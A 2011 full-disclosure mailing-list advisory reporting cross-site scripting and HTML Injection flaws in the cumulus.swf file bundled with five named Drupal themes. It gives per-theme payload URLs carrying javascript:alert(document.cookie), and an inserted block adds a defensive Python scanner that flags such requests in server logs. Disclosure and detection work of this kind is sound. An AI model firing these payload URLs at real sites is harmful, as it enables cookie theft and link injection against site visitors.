Message-ID: <004801cc8144$32c48180$9b7a6fd5@ml>
Date: Sun, 2 Oct 2011 23:42:10 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: "Vladimir '3APA3A' Dubrovin" <3APA3A@...URITY.NNOV.RU>,
<submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Vulnerability in multiple themes for Drupal
Hello list!
The endless saga continues. After reporting a lot of vulnerable plugins and
widgets that use this swf-file, here is information about multiple
vulnerable themes ;-).
I want to warn you about a Cross-Site Scripting vulnerability in multiple
themes for Drupal. Many other themes for Drupal and for other engines may be
vulnerable as well.
This XSS is similar to the XSS vulnerability in WP-Cumulus, which I
disclosed in 2009 (http://securityvulns.com/Wdocument842.html), because
these themes use cumulus.swf (it is the same tagcloud.swf made by the author
of WP-Cumulus).
I wrote about such vulnerabilities in 2009-2011; in particular, the millions
of tagcloud.swf flash files that are vulnerable to XSS attacks were covered
in my article XSS vulnerabilities in 34 millions flash files
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).
-------------------------
Affected products:
-------------------------
All versions of the Drupal themes Admire Grunge, Morok, Pushbutton, Danland
and Analytic are vulnerable.
----------
Details:
----------
XSS (WASC-08):
http://site/themes/admire_grunge/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/pushbutton/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
The code executes after a click, so this is strictly social XSS (it needs
user interaction). As in WP-Cumulus, it is also possible to conduct an HTML
Injection attack.
HTML Injection (WASC-12):
http://site/path/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
-------------------------------------------------
Fixed version of swf-file:
-------------------------------------------------
All users of these and other themes, plugins and widgets (and their
developers) that ship this swf-file can fix this issue by updating the
swf-file to the fixed version.
But as I wrote in my last advisory
(http://lists.grok.org.uk/pipermail/full-disclosure/2011-September/082656.html),
the developer of WP-Cumulus fixed only the XSS vector, not the HTML
Injection vector. So it is still possible to conduct HTML Injection attacks
(injecting arbitrary links) with all versions of this swf-file, including
the version with the XSS hole fixed, which should be taken into account.
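Because even the fixed swf-file still renders whatever links it is handed, site operators may want to spot such requests in their web server logs. The following detector is an added example, not part of the advisory or of any theme: it decodes the tagcloud parameter of requests for .swf files, parses the <tags> XML and reports script-scheme hrefs (the XSS vector) and external-host hrefs (the HTML Injection vector); the log lines and the host names in them are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs
from xml.etree import ElementTree as ET

# Constructed access-log lines (not from the advisory or any real site):
# line 1 is a legitimate tag cloud, line 2 carries the javascript: payload
# quoted in the advisory, line 3 an injected external link.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Oct/2011:23:42:10 +0300] "GET /themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='/taxonomy/term/1'%3Edrupal%3C/a%3E%3C/tags%3E HTTP/1.1" 200 31405
10.0.0.9 - - [02/Oct/2011:23:43:02 +0300] "GET /themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1" 200 31405
10.0.0.9 - - [02/Oct/2011:23:43:40 +0300] "GET /sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://external.example/'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1" 200 31405
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
SCRIPT_SCHEMES = {"javascript", "vbscript", "data"}

def classify_href(href, site_host):
    """Verdict for one <a href> inside a tagcloud document."""
    # Browsers ignore ASCII controls/whitespace inside a scheme; strip them first.
    parts = urlsplit(re.sub(r"[\x00-\x20]", "", href).lower())
    if parts.scheme in SCRIPT_SCHEMES:
        return "xss-wasc-08"             # script URL, runs when clicked
    if parts.hostname and parts.hostname != site_host:
        return "html-injection-wasc-12"  # arbitrary external link
    return "ok"

def analyze_tagcloud(xml_text, site_host):
    """Return (href, verdict) for every <a> in the decoded tagcloud XML."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return [(xml_text, "malformed-xml")]
    return [(a.get("href", ""), classify_href(a.get("href", ""), site_host))
            for a in root.iter("a")]

def scan_log(log_text, site_host):
    """Return (path, href, verdict) for every suspicious tagcloud request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(".swf"):
            continue
        # parse_qs percent-decodes the value and turns '+' into spaces.
        for cloud in parse_qs(url.query).get("tagcloud", []):
            for href, verdict in analyze_tagcloud(cloud, site_host):
                if verdict != "ok":
                    hits.append((url.path, href, verdict))
    return hits
```

Run scan_log(SAMPLE_LOG, "site") against your own logs by swapping in the site's host name; the legitimate relative link on the first line is not reported.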
------------
Timeline:
------------
2009.11.09 - disclosed the WP-Cumulus vulnerability at my site.
2009.11.11 - informed the developer of WP-Cumulus.
2009.11.15 - the developer of WP-Cumulus fixed the XSS (but not the HTML
Injection).
2011.10.01 - disclosed the five vulnerable themes for Drupal at my site.
Many other themes for Drupal and for other engines may be vulnerable as
well.
I described these vulnerabilities at my site:
http://websecurity.com.ua/5407/
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua